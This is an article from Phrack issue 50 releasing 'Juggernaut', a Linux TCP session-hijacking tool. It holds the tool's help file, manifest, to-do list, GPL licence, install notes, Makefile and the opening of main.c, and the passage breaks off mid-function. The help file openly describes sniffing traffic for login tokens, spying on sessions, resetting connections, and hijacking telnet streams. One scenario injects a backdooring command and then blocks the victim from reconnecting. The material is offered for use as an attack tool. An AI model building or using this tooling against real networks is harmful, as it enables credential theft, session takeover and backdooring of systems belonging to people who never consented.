| .oO Phrack 50 Oo. |
|
|
| Volume Seven, Issue Fifty |
|
|
| 6 of 16 |
|
|
| J U G G E R N A U T |
| |
| route|daemon9 |
|
|
| a guild corporation production 1996/7 |
|
|
|
|
| Please use the included extract.c utility to extract the files and then |
| read the Install file. Any problems/comments mail me route@infonexus.com. |
|
|
| A boot image is forthcoming that will allow a user to simply pop a disk |
| into most any networked PC and turn it into a Juggernaut workstation. |
|
|
| <++> Juggernaut/ClothLikeGauze/.help |
|
|
| Juggernaut 1.0 Help File |
|
|
| |-------- |
| |Overview |
| |-------- |
|
|
| Juggernaut is a robust network tool for the Linux OS. It contains several |
| modules offering a wide degree of functionality. Juggernaut has been tested |
| successfully on several different Linux machines on several different networks. |
| However, your mileage may vary depending on the network topologies of the |
| environment (ie: Smart hubbing will kill much of the packet sniffing |
| functionality...) and, to a lesser extent, the machine running Juggernaut. |
| If something doesn't work, use a network debugger and figure out why... |
|
|
| Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on |
| April 9, 1997. |
|
|
| Any serious problems/bugs or comments, please mail me: |
| |
| route@infonexus.com |
|
|
|
|
| |--------------------- |
| |Command Line Options |
| |--------------------- |
|
|
| juggernaut -h |
|
|
| Quick help. |
|
|
| juggernaut -H |
|
|
| Dumps this help file. |
|
|
| juggernaut -v |
|
|
| By default, Juggernaut conveys error messages and other |
| diagnostic information to the user. Specifying this |
| option will cause Juggernaut to shut the hell up. |
|
|
| Not recommended unless you know what you are doing. |
|
|
| juggernaut -t xx [ juggernaut -t 5 ] |
| |
| This option specifies the network read timeout (which |
| defaults to 10 seconds). This value reflects how long |
| Juggernaut will wait for network traffic before giving |
| up. In this case, it will wait 5 seconds. |
|
|
| juggernaut -s TOKEN [ juggernaut -s login ] |
|
|
| Dedicated sniffing mode. Juggernaut will drop to the |
| background and examine all TCP packets looking for |
| TOKEN. When TOKEN is located, it then isolates that |
| TCP circuit and captures the next 16 (the default |
| enticement factor) packets and logs them to a file. It |
| then resets and continues sifting through TCP traffic |
| looking for TOKEN. |
|
|
| juggernaut -s TOKEN -e xx [ juggernaut -s daemon9 -e 1000 ] |
|
|
| By specifying a larger enticement factor, you can |
| capture more packets from a session. This time, after |
| locating TOKEN, Juggernaut will capture 1000 packets |
| before reseting. |
|
|
| juggernaut |
| This starts the program in standard mode. |
| |
| |------------- |
| |Menu Options |
| |------------- |
|
|
| This is normal mode of operation for Juggernaut. This is where the magic |
| happens, this is where the fun is. The program will examine all network |
| traffic and add suitable TCP connections to the connection database (which |
| is viewed with option 1). After at least one connection is in the database, |
| you can start mucking around with it (connection construction and destruction |
| are indicated by the appearance of the "+" or the "-" at the console). Note |
| that connections involving a local interface may not show up (unless the |
| localhost is dual-homed). |
|
|
| One possible shortcoming of the program is the fact that it stores very |
| little state information about connections in the database. Juggernaut |
| collects whatever information it needs (and doesn't have) on the fly. As |
| such, a quiet connection (no traffic) will elude hijacking and reseting. The |
| benefit of this is the fact that the program does not have to tie itself up |
| updating the shared memory segment with state every time a packet flies by. |
|
|
|
|
| ?) Help |
| This file. |
|
|
| 0) Program information |
|
|
| Dumps some stuff... |
|
|
| 1) Connection database |
| |
| Dumps the current connection list and percent to |
| capacity. Gives the option to wipe the database. |
|
|
| 2) Spy on a connection |
|
|
| Allows a user to spy on any connection in the database, |
| with the option of logging the entire session to a |
| file. |
|
|
| 3) Reset a connection |
|
|
| Allows the user to destroy any existing connection in |
| the database. |
|
|
| 4) Automated connection reset daemon |
|
|
| Allows the user to setup an automated TCP RST daemon |
| that will listen for connection request attempts |
| from a specified source host (and optionally a |
| destination host) and then reset them before they |
| have a chance to complete. Requires a source IP |
| address and optionally a destination address. |
| This module prints a "*" to the console when a |
| connection request attempt is attempted and denied... |
| |
| 5) Simplex connection hijack |
|
|
| Allows the user to insert a command into a telnet |
| based TCP stream. A short ACK storm ensues until the |
| connection is subsequently reset. |
|
|
| 6) Interactive connection hijack |
|
|
| Allows the user to take over a session from a |
| legitimate client. This desynchs the client from the |
| server as the user takes over. The resulting ACK |
| storm can be catastrophic and makes this interactive |
| session prone to failure. If both of the target hosts |
| are on an ethernet, expect a momunmental ACK storm. |
|
|
| 7) Packet assembly module |
|
|
| The Prometheus module. Construction of TCP, UDP, ICMP, |
| and IP packets. The user has complete control over |
| most of the header fields and can opt for generating a |
| pseudo-random value. This module is far from done and |
| needs some serious work. |
| |
| 8) Souper sekret option number eight |
|
|
| Sshh. |
|
|
| 9) Step down |
| Quitter. |
|
|
|
|
| |------------- |
| |Suggested Use |
| |------------- |
|
|
| scenario 1: The passive observer |
| menu options 1,2 |
|
|
| The user is curious. She simply waits for |
| connections to arrive and then passively observes |
| them. Several invocations of Juggernaut may be |
| started, each spying on a different connection. |
| The user does not modify the flow of data or control. |
|
|
| scenario 2: The malicious observer |
| menu options 1,2,3 |
|
|
| Same scenario as above, except the user alters the |
| flow of control and opts to destroy connections |
| at some point. |
|
|
| scenario 3: The active observer |
| menu options 1,2,3,5,(6) |
|
|
| Same as the previous situations, however the user |
| inserts data into the stream before destroying it. |
| scenario 4: The imp |
| menu options 1,2,3,4 |
|
|
| The user is an impish devil and simply wants to |
| cause trouble by setting up multiple ACRST daemons. |
|
|
| scenario 5: The active observer with poisonous reverse |
| menu options 1,2,4,5 |
|
|
| The user waits until a client establishes a connection |
| with a targeted server and then sets up the ACRST |
| daemon to destroy all further connection-request |
| attempts from the client. The user then spys on the |
| connection, waiting for an opportune time to inject |
| a hijack packet into the stream containing a |
| backdooring command/pipeline. The client will then |
| have her connection RST (after a brief ACK storm). |
| If the client attempts to re-establish the connection |
| with the server, she will be denied and likely think |
| it is a transient network error. The user can then |
| login into the server using the backdoor without fear |
| of the client logging back in. |
|
|
|
|
| |
| Juggernaut is a Guild Corporation production, (c) 1996/7. |
| |
| [corporate persuasion through Internet terrorism] |
| |
| EOF |
| <--> |
| <++> Juggernaut/ClothLikeGauze/MANIFEST |
|
|
| File Manifest for Juggernaut 1.0 |
| ---------------------------- |
| 1996/7 daemon9[guild|phrack|r00t] |
| ---------------------------- |
| ClothLikeGauze/ Docs |
| .help Helpfile |
| copyright The legal tie that binds. |
| Install Installation instructions |
| MANIFEST This file |
| Makefile makefile |
| NumberOneCrush/ Sources |
| main.c main logic |
| mem.c shared memory/semaphore functions |
| menu.c menu functions |
| prometheus.c packet assembly workshop module |
| net.c socket/network functions |
| surplus.c dumping ground |
|
|
|
|
| Version history |
| --------------- |
|
|
| version a1: |
| ----------- |
| 11.30.96: Decided to start. Juggernaut framework and queue stuff. Used |
| linked list queue originally to store connections. |
| 12.01.96: Sniffing/spying/logging/RST stuff. |
| 12.02-04: Not sure what I did here. I think I had a large turkey samich. |
| 12.05.96: Redid memory abstract data type. Multithreaded. Implemented |
| shared memory segment and semaphore for access control. |
| Dumped ALL the dynamic memory allocation code. |
| 12.06.96: Added packet assembly workshop hooks. Added curses. Removed |
| curses. |
| 12.07.96: No coding today. |
| 12.08.96: Non-interactive hijacking completed. I think we're ready for |
| beta now. |
|
|
| version b1: |
| ----------- |
| 12.09.96: IP_HDRINCL crap added. |
| 12.15-18: I was in NYC for the r00tparty. No coding then. |
| 12.19.96: Added automated RST stuff. |
| 12.20-27: No coding. |
| 12.28.96: Started work on interactive hijacking. Damned ACK storms. |
| 12.30.96: Started packet assembly module for reals. |
|
|
| version b2: |
| ----------- |
| 01.25.97: Added network timeout logic. |
| 01.26.97- |
| 04.01.97: How can you possibly expect me to account for all that time? |
| I went to Germany with alhambra for a networking summit and |
| all over the US for other work, I was even in a Discovery |
| special on IW... |
|
|
| version 1.0: |
| ------------ |
| 04.02.97: Here it is. |
| <--> |
| <++> Juggernaut/ClothLikeGauze/ToDo |
|
|
| Juggernaut ToDo list |
| -------------------- |
| + re-structure multitasking model to give the option of |
| using multi-processing OR multi-threading |
| + Create boot image |
| + Support for ongoing connections |
| + Support for healthy choice hotdog sequencer |
| + Add arp cache seeding routine; as connections are added, MAC |
| addresses will be added to the arp cache |
| + Add support for different verbosity levels |
| + Add support for IP and TCP options in packet assembly module |
| + Better packet assembly support as a whole |
| + Better code module plug-in support |
| + much more robust packet sniffing module with support for |
| multiple protocols |
| + um, interactive hijacking that doesn't kill the client |
| <--> |
| <++> Juggernaut/ClothLikeGauze/copyright |
| |
| Juggernaut |
| |
| Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com) |
| |
| Juggernaut source code, documentation, auxilliary programs, and |
| executables are Copyright 1996/7 daemon9[guild]. All rights reserved. |
|
|
| ---------------------------------------------------------------------- |
|
|
| GNU GENERAL PUBLIC LICENSE |
| Version 2, June 1991 |
|
|
| Copyright (C) 1989, 1991 Free Software Foundation, Inc. |
| 675 Mass Ave, Cambridge, MA 02139, USA |
| Everyone is permitted to copy and distribute verbatim copies |
| of this license document, but changing it is not allowed. |
|
|
| Preamble |
|
|
| The licenses for most software are designed to take away your |
| freedom to share and change it. By contrast, the GNU General Public |
| License is intended to guarantee your freedom to share and change free |
| software--to make sure the software is free for all its users. This |
| General Public License applies to most of the Free Software |
| Foundation's software and to any other program whose authors commit to |
| using it. (Some other Free Software Foundation software is covered by |
| the GNU Library General Public License instead.) You can apply it to |
| your programs, too. |
|
|
| When we speak of free software, we are referring to freedom, not |
| price. Our General Public Licenses are designed to make sure that you |
| have the freedom to distribute copies of free software (and charge for |
| this service if you wish), that you receive source code or can get it |
| if you want it, that you can change the software or use pieces of it |
| in new free programs; and that you know you can do these things. |
|
|
| To protect your rights, we need to make restrictions that forbid |
| anyone to deny you these rights or to ask you to surrender the rights. |
| These restrictions translate to certain responsibilities for you if you |
| distribute copies of the software, or if you modify it. |
|
|
| For example, if you distribute copies of such a program, whether |
| gratis or for a fee, you must give the recipients all the rights that |
| you have. You must make sure that they, too, receive or can get the |
| source code. And you must show them these terms so they know their |
| rights. |
|
|
| We protect your rights with two steps: (1) copyright the software, and |
| (2) offer you this license which gives you legal permission to copy, |
| distribute and/or modify the software. |
|
|
| Also, for each author's protection and ours, we want to make certain |
| that everyone understands that there is no warranty for this free |
| software. If the software is modified by someone else and passed on, we |
| want its recipients to know that what they have is not the original, so |
| that any problems introduced by others will not reflect on the original |
| authors' reputations. |
|
|
| Finally, any free program is threatened constantly by software |
| patents. We wish to avoid the danger that redistributors of a free |
| program will individually obtain patent licenses, in effect making the |
| program proprietary. To prevent this, we have made it clear that any |
| patent must be licensed for everyone's free use or not licensed at all. |
|
|
| The precise terms and conditions for copying, distribution and |
| modification follow. |
| |
| GNU GENERAL PUBLIC LICENSE |
| TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION |
|
|
| 0. This License applies to any program or other work which contains |
| a notice placed by the copyright holder saying it may be distributed |
| under the terms of this General Public License. The "Program", below, |
| refers to any such program or work, and a "work based on the Program" |
| means either the Program or any derivative work under copyright law: |
| that is to say, a work containing the Program or a portion of it, |
| either verbatim or with modifications and/or translated into another |
| language. (Hereinafter, translation is included without limitation in |
| the term "modification".) Each licensee is addressed as "you". |
|
|
| Activities other than copying, distribution and modification are not |
| covered by this License; they are outside its scope. The act of |
| running the Program is not restricted, and the output from the Program |
| is covered only if its contents constitute a work based on the |
| Program (independent of having been made by running the Program). |
| Whether that is true depends on what the Program does. |
|
|
| 1. You may copy and distribute verbatim copies of the Program's |
| source code as you receive it, in any medium, provided that you |
| conspicuously and appropriately publish on each copy an appropriate |
| copyright notice and disclaimer of warranty; keep intact all the |
| notices that refer to this License and to the absence of any warranty; |
| and give any other recipients of the Program a copy of this License |
| along with the Program. |
|
|
| You may charge a fee for the physical act of transferring a copy, and |
| you may at your option offer warranty protection in exchange for a fee. |
|
|
| 2. You may modify your copy or copies of the Program or any portion |
| of it, thus forming a work based on the Program, and copy and |
| distribute such modifications or work under the terms of Section 1 |
| above, provided that you also meet all of these conditions: |
|
|
| a) You must cause the modified files to carry prominent notices |
| stating that you changed the files and the date of any change. |
|
|
| b) You must cause any work that you distribute or publish, that in |
| whole or in part contains or is derived from the Program or any |
| part thereof, to be licensed as a whole at no charge to all third |
| parties under the terms of this License. |
|
|
| c) If the modified program normally reads commands interactively |
| when run, you must cause it, when started running for such |
| interactive use in the most ordinary way, to print or display an |
| announcement including an appropriate copyright notice and a |
| notice that there is no warranty (or else, saying that you provide |
| a warranty) and that users may redistribute the program under |
| these conditions, and telling the user how to view a copy of this |
| License. (Exception: if the Program itself is interactive but |
| does not normally print such an announcement, your work based on |
| the Program is not required to print an announcement.) |
| |
| These requirements apply to the modified work as a whole. If |
| identifiable sections of that work are not derived from the Program, |
| and can be reasonably considered independent and separate works in |
| themselves, then this License, and its terms, do not apply to those |
| sections when you distribute them as separate works. But when you |
| distribute the same sections as part of a whole which is a work based |
| on the Program, the distribution of the whole must be on the terms of |
| this License, whose permissions for other licensees extend to the |
| entire whole, and thus to each and every part regardless of who wrote it. |
|
|
| Thus, it is not the intent of this section to claim rights or contest |
| your rights to work written entirely by you; rather, the intent is to |
| exercise the right to control the distribution of derivative or |
| collective works based on the Program. |
|
|
| In addition, mere aggregation of another work not based on the Program |
| with the Program (or with a work based on the Program) on a volume of |
| a storage or distribution medium does not bring the other work under |
| the scope of this License. |
|
|
| 3. You may copy and distribute the Program (or a work based on it, |
| under Section 2) in object code or executable form under the terms of |
| Sections 1 and 2 above provided that you also do one of the following: |
|
|
| a) Accompany it with the complete corresponding machine-readable |
| source code, which must be distributed under the terms of Sections |
| 1 and 2 above on a medium customarily used for software interchange; or, |
|
|
| b) Accompany it with a written offer, valid for at least three |
| years, to give any third party, for a charge no more than your |
| cost of physically performing source distribution, a complete |
| machine-readable copy of the corresponding source code, to be |
| distributed under the terms of Sections 1 and 2 above on a medium |
| customarily used for software interchange; or, |
|
|
| c) Accompany it with the information you received as to the offer |
| to distribute corresponding source code. (This alternative is |
| allowed only for noncommercial distribution and only if you |
| received the program in object code or executable form with such |
| an offer, in accord with Subsection b above.) |
|
|
| The source code for a work means the preferred form of the work for |
| making modifications to it. For an executable work, complete source |
| code means all the source code for all modules it contains, plus any |
| associated interface definition files, plus the scripts used to |
| control compilation and installation of the executable. However, as a |
| special exception, the source code distributed need not include |
| anything that is normally distributed (in either source or binary |
| form) with the major components (compiler, kernel, and so on) of the |
| operating system on which the executable runs, unless that component |
| itself accompanies the executable. |
|
|
| If distribution of executable or object code is made by offering |
| access to copy from a designated place, then offering equivalent |
| access to copy the source code from the same place counts as |
| distribution of the source code, even though third parties are not |
| compelled to copy the source along with the object code. |
| |
| 4. You may not copy, modify, sublicense, or distribute the Program |
| except as expressly provided under this License. Any attempt |
| otherwise to copy, modify, sublicense or distribute the Program is |
| void, and will automatically terminate your rights under this License. |
| However, parties who have received copies, or rights, from you under |
| this License will not have their licenses terminated so long as such |
| parties remain in full compliance. |
|
|
| 5. You are not required to accept this License, since you have not |
| signed it. However, nothing else grants you permission to modify or |
| distribute the Program or its derivative works. These actions are |
| prohibited by law if you do not accept this License. Therefore, by |
| modifying or distributing the Program (or any work based on the |
| Program), you indicate your acceptance of this License to do so, and |
| all its terms and conditions for copying, distributing or modifying |
| the Program or works based on it. |
|
|
| 6. Each time you redistribute the Program (or any work based on the |
| Program), the recipient automatically receives a license from the |
| original licensor to copy, distribute or modify the Program subject to |
| these terms and conditions. You may not impose any further |
| restrictions on the recipients' exercise of the rights granted herein. |
| You are not responsible for enforcing compliance by third parties to |
| this License. |
|
|
| 7. If, as a consequence of a court judgment or allegation of patent |
| infringement or for any other reason (not limited to patent issues), |
| conditions are imposed on you (whether by court order, agreement or |
| otherwise) that contradict the conditions of this License, they do not |
| excuse you from the conditions of this License. If you cannot |
| distribute so as to satisfy simultaneously your obligations under this |
| License and any other pertinent obligations, then as a consequence you |
| may not distribute the Program at all. For example, if a patent |
| license would not permit royalty-free redistribution of the Program by |
| all those who receive copies directly or indirectly through you, then |
| the only way you could satisfy both it and this License would be to |
| refrain entirely from distribution of the Program. |
|
|
| If any portion of this section is held invalid or unenforceable under |
| any particular circumstance, the balance of the section is intended to |
| apply and the section as a whole is intended to apply in other |
| circumstances. |
|
|
| It is not the purpose of this section to induce you to infringe any |
| patents or other property right claims or to contest validity of any |
| such claims; this section has the sole purpose of protecting the |
| integrity of the free software distribution system, which is |
| implemented by public license practices. Many people have made |
| generous contributions to the wide range of software distributed |
| through that system in reliance on consistent application of that |
| system; it is up to the author/donor to decide if he or she is willing |
| to distribute software through any other system and a licensee cannot |
| impose that choice. |
|
|
| This section is intended to make thoroughly clear what is believed to |
| be a consequence of the rest of this License. |
| |
| 8. If the distribution and/or use of the Program is restricted in |
| certain countries either by patents or by copyrighted interfaces, the |
| original copyright holder who places the Program under this License |
| may add an explicit geographical distribution limitation excluding |
| those countries, so that distribution is permitted only in or among |
| countries not thus excluded. In such case, this License incorporates |
| the limitation as if written in the body of this License. |
|
|
| 9. The Free Software Foundation may publish revised and/or new versions |
| of the General Public License from time to time. Such new versions will |
| be similar in spirit to the present version, but may differ in detail to |
| address new problems or concerns. |
|
|
| Each version is given a distinguishing version number. If the Program |
| specifies a version number of this License which applies to it and "any |
| later version", you have the option of following the terms and conditions |
| either of that version or of any later version published by the Free |
| Software Foundation. If the Program does not specify a version number of |
| this License, you may choose any version ever published by the Free Software |
| Foundation. |
|
|
| 10. If you wish to incorporate parts of the Program into other free |
| programs whose distribution conditions are different, write to the author |
| to ask for permission. For software which is copyrighted by the Free |
| Software Foundation, write to the Free Software Foundation; we sometimes |
| make exceptions for this. Our decision will be guided by the two goals |
| of preserving the free status of all derivatives of our free software and |
| of promoting the sharing and reuse of software generally. |
|
|
| NO WARRANTY |
|
|
| 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY |
| FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN |
| OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES |
| PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED |
| OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF |
| MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS |
| TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE |
| PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, |
| REPAIR OR CORRECTION. |
|
|
| 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING |
| WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR |
| REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, |
| INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING |
| OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED |
| TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY |
| YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER |
| PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE |
| POSSIBILITY OF SUCH DAMAGES. |
|
|
| END OF TERMS AND CONDITIONS |
| |
| Appendix: How to Apply These Terms to Your New Programs |
|
|
| If you develop a new program, and you want it to be of the greatest |
| possible use to the public, the best way to achieve this is to make it |
| free software which everyone can redistribute and change under these terms. |
|
|
| To do so, attach the following notices to the program. It is safest |
| to attach them to the start of each source file to most effectively |
| convey the exclusion of warranty; and each file should have at least |
| the "copyright" line and a pointer to where the full notice is found. |
|
|
| <one line to give the program's name and a brief idea of what it does.> |
| Copyright (C) 19yy <name of author> |
|
|
| This program is free software; you can redistribute it and/or modify |
| it under the terms of the GNU General Public License as published by |
| the Free Software Foundation; either version 2 of the License, or |
| (at your option) any later version. |
|
|
| This program is distributed in the hope that it will be useful, |
| but WITHOUT ANY WARRANTY; without even the implied warranty of |
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
| GNU General Public License for more details. |
|
|
| You should have received a copy of the GNU General Public License |
| along with this program; if not, write to the Free Software |
| Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. |
|
|
| Also add information on how to contact you by electronic and paper mail. |
|
|
| If the program is interactive, make it output a short notice like this |
| when it starts in an interactive mode: |
|
|
| Gnomovision version 69, Copyright (C) 19yy name of author |
| Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. |
| This is free software, and you are welcome to redistribute it |
| under certain conditions; type `show c' for details. |
|
|
| The hypothetical commands `show w' and `show c' should show the appropriate |
| parts of the General Public License. Of course, the commands you use may |
| be called something other than `show w' and `show c'; they could even be |
| mouse-clicks or menu items--whatever suits your program. |
|
|
| You should also get your employer (if you work as a programmer) or your |
| school, if any, to sign a "copyright disclaimer" for the program, if |
| necessary. Here is a sample; alter the names: |
|
|
| Yoyodyne, Inc., hereby disclaims all copyright interest in the program |
| `Gnomovision' (which makes passes at compilers) written by James Hacker. |
|
|
| <signature of Ty Coon>, 1 April 1989 |
| Ty Coon, President of Vice |
|
|
| This General Public License does not permit incorporating your program into |
| proprietary programs. If your program is a subroutine library, you may |
| consider it more useful to permit linking proprietary applications with the |
| library. If this is what you want to do, use the GNU Library General |
| Public License instead of this License. |
| <--> |
| <++> Juggernaut/Install |
| Juggernaut 1.0 Installation Instructions |
| ---------------------------------------- |
| 1. Are you a fucking moron? If so, goto step 6; you are done. |
|
|
| 2. Edit the Makefile. You may wish to change a few of the |
| defines: |
|
|
| USENAME: Define this to have Juggernaut attempt to |
| resolve IP addresses into FQDNs... It's |
| slower but more verbose this way. |
| MULTI_P: Define this to use multi-process model of |
| multi-tasking. |
| THREAD: Define this to use multi-threaded model of |
| multi-tasking. Be sure to also link in |
| the pthreads library. Not implemented yet. |
| IP_HDRINCL: Define this if you want/need to use the |
| IP_HDRINCL socket option to build IP |
| headers. |
| NOHUSH: If defined, Juggernaut will notify the user |
| audibly when a connection is added. |
| GREED: If defined, Juggernaut will attempt to add |
| any and ALL TCP based connections to the |
| database. This is not recommended unless |
| you know what you are doing... |
| FASTCHECK: Define this to use a fast x86 assembler |
| implementation of the IP checksum routine. |
| May not work on all systems. That's why |
| you have the option. |
| 3. make all |
|
|
| 4. yay. |
|
|
| 5. ./juggernaut -h |
| <--> |
| <++> Juggernaut/Makefile |
| # Juggernaut Makefile |
| # 1996/7 daemon9[guild|phrack|r00t] |
|
|
| CC = gcc |
| #LIBS = -L/usr/lib -lpthread |
| CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 #-Wall |
| DEFINES = -DMULTI_P -DNOHUSH -DUSENAME -DFASTCHECK |
| DEFINES += #-DGREED #-DIP_HDRINCL #-DTHREAD |
| OBJECTS = NumberOneCrush/main.o NumberOneCrush/menu.o\ |
| NumberOneCrush/mem.o NumberOneCrush/prometheus.o\ |
| NumberOneCrush/net.o NumberOneCrush/surplus.o |
|
|
| .c.o: |
| $(CC) $(CFLAGS) $(DEFINES) -c $< -o $@ |
|
|
| all: JUGGERNAUT |
|
|
| JUGGERNAUT: $(OBJECTS) |
| $(CC) $(CFLAGS) $(DEFINES) $(OBJECTS) $(LIBS) -o juggernaut |
| strip juggernaut |
|
|
| clean: |
| rm -f core juggernaut juggernaut.log.snif juggernaut.log.spy |
| rm -rf NumberOneCrush/*.o |
| <--> |
| <++> Juggernaut/NumberOneCrush/main.c |
| /* |
| * |
| * Juggernaut |
| * Version b2 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * main.c - main control logic and program driver. Consists mainly of wrappers |
| * to setup the main subfunctions. |
| * |
| * |
| */ |
|
|
| #include <string.h> |
| #include <signal.h> |
| #include <stdlib.h> |
| #include <stdio.h> |
| #include <unistd.h> |
| #include <fcntl.h> |
| #include <ctype.h> |
| #include <syslog.h> |
| #include <sys/types.h> |
| #include <sys/socket.h> |
| #include <sys/wait.h> |
| #include <sys/ioctl.h> |
| #include <sys/stat.h> |
| #include <sys/time.h> |
| #include <sys/resource.h> |
| #include <netinet/in.h> |
|
|
| #ifdef THREAD |
| #include <pthread.h> |
| #endif |
|
|
| #define MINIBUF 10 |
| #define BUFSIZE 512 |
| #define DEVICE "eth0" |
| #define LOGFILE "./juggernaut.log.spy" |
|
|
| char version[]="1.0\0"; |
| int sigsentry=1; /* Signal sentry */ |
| int ripsock=0; /* RIP socket */ |
| int linksock=0; /* SOCK PACKET socket */ |
| int hpid=0; /* hunter child PID */ |
| int acrstpid=0; /* automated connection reset PID */ |
| int netreadtimeout=10; /* Network read timeout in seconds */ |
| int verbosity=1; /* Level of verbosity */ |
| int enticementfactor=16; /* Enticing packets!@ */ |
| time_t uptime=0; /* How long have we been running */ |
|
|
| struct connectionInfo{ /* Simple tuple information */ |
| unsigned long saddr; /* Source IP */ |
| unsigned long daddr; /* Destination IP */ |
| unsigned short sport; /* Source TCP Port */ |
| unsigned short dport; /* Destination TCP Port */ |
| }; |
|
|
|
|
| /* |
| * Main control logic. All the main logic is implemented in the switch |
| * statement. |
| */ |
|
|
| int main(argc,argv) |
| int argc; |
| char *argv[]; |
| { |
|
|
| void usage(char *); |
| void hunt(); |
| void spy(); |
| void rst(); |
| void arst(); |
| void pkta(); |
| void simplexhijack(); |
| void hijack(); |
| void powerup(); |
| void minit(); |
| void mwipe(); |
| void mmain(); |
| void twitch(); |
| void cleanexit(); |
| void bloodhound(char *,int); |
| void bookworm(); |
| void dbmanip(); |
| void jinfo(); |
| int rawsock(); |
| int tap(); |
| float dump(); |
| |
| char buf[MINIBUF]={0}; |
| char token[2*MINIBUF]={0}; |
| int c; |
| |
| if(geteuid()||getuid()){ /* r00t? */ |
| fprintf(stderr,"UID or EUID of 0 needed...\n"); |
| exit(0); |
| } |
| /* Parse command-line arguments */ |
| while((c=getopt(argc,argv,"s:e:t:vVhH"))!=-1){ |
| switch(c){ |
| case 's': /* dedicated sniffing mode */ |
| strncpy(token,optarg,(sizeof(token)-1)); |
| break; |
| case 'e': /* Enticement factor (only valid |
| with -s option) */ |
| enticementfactor=atoi(optarg); |
| break; |
| case 't': /* Network alarm timeout */ |
| netreadtimeout=atoi(optarg); |
| break; |
| case 'v': /* decrease verbosity */ |
| verbosity=0; |
| break; |
| case 'V': /* version info */ |
| jinfo(); |
| exit(0); |
| case 'h': /* Help is on the way my friend */ |
| usage(argv[0]); |
| exit(0); |
| case 'H': /* Help is on the way my friend */ |
| bookworm(); |
| exit(0); |
| default: |
| usage(argv[0]); |
| break; |
| } |
| } |
| if(token[0]){ |
| bloodhound(token,enticementfactor); |
| exit(0); |
| } |
|
|
| mwipe(); |
| minit(); /* Initial menu */ |
| fprintf(stderr,"[cr]"); |
| getchar(); |
|
|
| signal(SIGINT,twitch); /* Catch these signals */ |
| signal(SIGQUIT,twitch); |
|
|
| ripsock=rawsock(); /* Setup RIP socket */ |
| linksock=tap(DEVICE); /* Setup link socket */ |
|
|
| powerup(); /* Setup shared memory and |
| semaphore */ |
| time(&uptime); /* Start the uptime timer */ |
| hunt(); /* Start the connection hunter */ |
| |
| while(1){ |
| mwipe(); |
| mmain(); |
| bzero(&buf,sizeof(buf)); |
| fgets(buf,sizeof(buf),stdin); |
| switch(buf[0]){ |
| case '?': |
| mwipe(); |
| bookworm(); |
| mwipe(); |
| break; |
| case '0': |
| mwipe(); |
| jinfo(); |
| mwipe(); |
| break; |
| case '1': |
| mwipe(); |
| dbmanip(); |
| mwipe(); |
| break; |
| case '2': /* Watch a connection. */ |
| mwipe(); |
| spy(); |
| mwipe(); |
| break; |
| case '3': /* Kill a connection. */ |
| mwipe(); |
| rst(); |
| mwipe(); |
| break; |
| case '4': /* Automated CRST daemon. */ |
| mwipe(); |
| arst(); |
| mwipe(); |
| break; |
| case '5': /* Insert a single command. */ |
| mwipe(); |
| simplexhijack(); |
| mwipe(); |
| break; |
| case '6': /* Hijack the session from the client */ |
| mwipe(); |
| hijack(); |
| mwipe(); |
| break; |
| case '7': /* The packet assembly workshop */ |
| mwipe(); |
| pkta(); |
| mwipe(); |
| break; |
| case '8': /* For future use. */ |
| break; |
| case '9': |
| cleanexit(); |
| default: |
| continue; |
| } |
| } |
| /* NOT REACHED */ |
| return(0); |
| } |
|
|
|
|
| /* |
| * chunt wrapper |
| */ |
|
|
| void hunt(){ |
|
|
| #ifdef MULTI_P |
| void spasm(); /* Handles the user defined signal */ |
| void chunt(); |
|
|
| switch((hpid=fork())){ |
| case 0: /* Child */ |
| signal(SIGUSR1,spasm); |
| signal(SIGINT,SIG_IGN); /* Catch these signals */ |
| signal(SIGQUIT,SIG_IGN); |
| close(ripsock); /* Not needed in hunter */ |
| chunt(); |
| default: |
| break; /* Parent continues */ |
| case -1: |
| if(verbosity)perror("(hunt) internal forking error [fatal]"); |
| exit(1); |
| } |
| #endif |
|
|
| #ifdef THREAD |
|
|
| MULTIPLE THREADS OF EXECUTION IS NOT IMPLEMENTED YET. |
|
|
| void chunt(); |
|
|
| pthread_t hunter_t; |
|
|
| pthread_create(&hunter_t,NULL,(void *)chunt(),(void *)NULL); |
|
|
| #endif |
|
|
| } |
|
|
|
|
| /* |
| * cspy wrapper |
| */ |
|
|
| void spy(){ |
|
|
| void convulsion(); |
| float dump(); |
| struct connectionInfo *checkc(int); |
| void cspy(struct connectionInfo *,FILE *); |
|
|
| char buf[MINIBUF]; |
| unsigned short val; |
| struct connectionInfo *target; |
| FILE *fp=0; |
|
|
| dump(); |
| |
